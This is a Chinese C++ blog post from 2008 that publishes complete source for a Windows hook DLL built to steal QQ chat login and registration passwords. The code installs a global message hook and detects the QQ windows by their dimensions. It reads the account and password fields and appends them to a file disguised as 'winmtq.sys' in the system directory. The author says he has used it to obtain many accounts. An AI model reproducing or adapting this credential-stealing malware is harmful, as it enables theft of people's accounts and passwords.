socketref,再見！高德

https://github.com/adoggie

C++博客 :: 首頁 :: 聯系 :: 聚合

:: 管理

246 Posts :: 4 Stories :: 312 Comments :: 0 Trackbacks

常用鏈接

留言簿(54)

我參與的團隊

隨筆分類

隨筆檔案

文章分類

文章檔案

相冊

Gis

OpenSource

gnome.org
gnu.org
sf.net
www.w3c.org
www.w3c.org

搜索

閱讀排行榜

評論排行榜

等盜取QQ2002登錄密碼的代碼

出于愛好，寫了此小程序，曾經也獲取了很多QQ
采用共享數據區方式

  1 // hook.cpp : Defines the entry point for the DLL application.
  2 //
  3 #include "stdafx.h"
  4
  5 #pragma data_seg("publicdata")
  6  HHOOK hhk=0;
  7  HWND hokkwnd=0;
  8  HWND hwndqq_zc=0;
  9  int k=0;
10  int pc=0;
11  char keys[200]={0};
12 #pragma data_seg( )
13 #pragma comment(linker, "/SECTION:publicdata,RWS")
14 //dll中創建共享數據段，切記！！！所有變量必須初始化，否則創建將失敗
15
16  /*
17     登錄窗體控件id:
18         用戶號碼: 138
19         密碼：180
20         登錄（按鈕）: 1
21         記住密碼:323
22
23     注冊窗體控件id：
24         用戶： 460
25         密碼： 461
26         下一步（按鈕）：12324
27   */
28
29 #include <stdio.h>
30 #include <stdlib.h>
31
32
33
34 BOOL APIENTRY DllMain( HANDLE hModule,
35                        DWORD  ul_reason_for_call,
36                        LPVOID lpReserved
37                      )
38 {
39     return TRUE;
40 }
41
42 const int WND_NONE=0;     //非破解QQ窗體
43 const int WND_LOGIN=1 ; //qq 登錄窗體
44 const int WND_ZC=2;     //QQ 注冊窗體
45
46 int GetWnd(HWND hwnd){
47     RECT rc;
48     ::GetWindowRect(hwnd,&rc);
49     int w,h;
50     w = rc.right-rc.left;
51     h = rc.bottom- rc.top;
52     if(w== 462  && h==355){
53         return WND_ZC;
54     }
55     if(w== 266  && h==180){
56         return WND_LOGIN;
57     }
58     return WND_NONE;
59 }
60
61 char buf[200]    ;
62
63 void keyfilter(char key){
64     keys[pc]= key;
65     pc++;
66     if(key==8){
67         pc--;
68         keys[pc]=0;
69     }
70 }
71
72 void save(){
73 //    ::MessageBox(0,"Begin dump data

",0,MB_OK);
74     /* 檢測是否在輸入帳號密碼時按下的 next 按鈕 */
75     if(GetWnd(    hwndqq_zc)==WND_ZC){
76         HWND hsub;
77         hsub = ::GetWindow(hwndqq_zc,GW_CHILD);
78         hsub = ::GetDlgItem(hsub,460); //取用戶號控件句柄
79         if(!IsWindowVisible(hsub)){ //在其它propertypage 上按下next 不保存信息
80             return ;
81         }
82     }
83
84     char buf[100],writebuf[100];;
85
86     memset(buf,0,sizeof(buf));
87     ::GetSystemDirectory(buf,sizeof(buf));
88     strcat(buf,"\\winmtq.sys");
89     //::MessageBox(0,buf,0,MB_OK);
90     FILE *pfile = fopen(buf,"a+");
91
92     memset(buf,0,sizeof(buf));
93     memset(writebuf,0,sizeof(writebuf));
94 ////////////////////////////////////////////////////////
95     if(GetWnd(    hwndqq_zc)==WND_ZC){
96         /*  取注冊窗體信息*/
97         HWND hsub  = ::GetWindow(hwndqq_zc,GW_CHILD);
98         //460
99         ::GetDlgItemText(hsub,460,buf,sizeof(buf));
100         strcpy(writebuf,buf);
101         strcat(writebuf,"|");
102         memset(buf,0,sizeof(buf));
103         ::GetDlgItemText(hsub,461,buf,sizeof(buf));
104         strcat(writebuf,buf);
105         strcat(writebuf,"&");
106     }
107 ///////////////////////////////////////////////////////
108 /*取登錄窗體信息*/
109     if(GetWnd(hwndqq_zc) == WND_LOGIN){
110 //        ::MessageBox(0,"lgin crack",0,MB_OK);
111         //取用戶號
112         int cursel ;
113
114         HWND hsub;
115         hsub = ::GetDlgItem(hwndqq_zc,138);
116         memset(buf,0,sizeof(buf));
117         cursel= ::SendMessage((HWND)hsub,CB_GETCURSEL,0,0);
118         ::SendMessage((HWND)hsub,CB_GETLBTEXT,cursel,(LONG)buf);
119         strcpy(writebuf,buf);
120         strcat(writebuf,"|");
121         memset(buf,0,sizeof(buf));
122         ::GetDlgItemText(hwndqq_zc,180,buf,sizeof(buf));
123         strcat(writebuf,buf);
124         strcat(writebuf,"&");
125     }
126 ///////////////////////////////////////////////////////
127
128 //    ::MessageBox(0,writebuf,0,MB_OK);
129
130     fwrite(writebuf,1,strlen(writebuf)+2,pfile);
131     fclose(pfile);
132
133 }
134
135 LRESULT CALLBACK GetMsgProc(
136   int code,       // hook code
137   WPARAM wParam,  // removal option
138   LPARAM lParam   // message
139   ){
140     MSG  *pmsg =(MSG*)lParam;
141     HWND hwnd ;
142     HWND hnext;
143     HWND hlogin;
144     if (code < 0){
145         goto end;
146     }
147
148 /*
149     if(pmsg->message ==WM_CHAR && pmsg->hwnd == hokkwnd){ //
150     //    keyfilter(pmsg->wParam);
151
152     }
153 */
154
155     /*一下檢測是否用戶選擇了"下一步"或者"登錄"按鈕*/
156
157     if(pmsg->message == WM_KEYDOWN  && pmsg->wParam ==VK_RETURN ){ // && LOWORD(wParam)==12324
158         int btnid;
159         if(GetWnd(    hwndqq_zc)==WND_ZC){
160             btnid = 461;//12324;
161         }
162         if(GetWnd(hwndqq_zc) == WND_LOGIN){
163             btnid =180; //用于輸入密碼后打回車
164         }
165         hnext = ::GetDlgItem(hwndqq_zc,btnid);
166         if(GetWnd(    hwndqq_zc)==WND_ZC){
167             HWND hs = ::GetWindow(hwndqq_zc,GW_CHILD);
168
169             hnext = ::GetDlgItem(hs,btnid);
170         }
171     //    ::MessageBox(0,"key deal",0,MB_OK);
172         if(pmsg->hwnd ==hnext)
173             save();
174     }
175     if(pmsg->message ==WM_LBUTTONUP ){
176         int btnid;
177         if(GetWnd(    hwndqq_zc)==WND_ZC){
178             btnid = 12324;
179         }
180         if(GetWnd(hwndqq_zc) == WND_LOGIN){
181             btnid =1; //登錄窗體的登錄按鈕
182         }
183         hnext = ::GetDlgItem(hwndqq_zc,btnid);
184         if(pmsg->hwnd == hnext)
185             save();
186     }
187 end :
188     return CallNextHookEx(hhk,code,wParam,lParam);
189
190 }
191
192 extern "C" bool __stdcall __declspec(dllexport) sethook(HWND qqzc/*qq注冊窗體句柄*/){
193
194      hwndqq_zc=qqzc;
195     HINSTANCE hdll = GetModuleHandle("hook.dll");
196     hhk = SetWindowsHookEx(WH_GETMESSAGE,HOOKPROC(GetMsgProc) ,hdll,0);
197     if(!hhk)    return false;
198     return true;
199 }
200
201 extern "C" bool __stdcall __declspec(dllexport) unhook(){
202     ::UnhookWindowsHookEx(hhk);
203     return true;
204 }
205
206

posted on 2008-07-03 23:16 放屁阿狗閱讀(1085) 評論(3) 編輯收藏引用所屬分類: Crack

Feedback

# re: 等盜取QQ2002登錄密碼的代碼 2009-03-09 14:46 羊

yangbojia.com 回復更多評論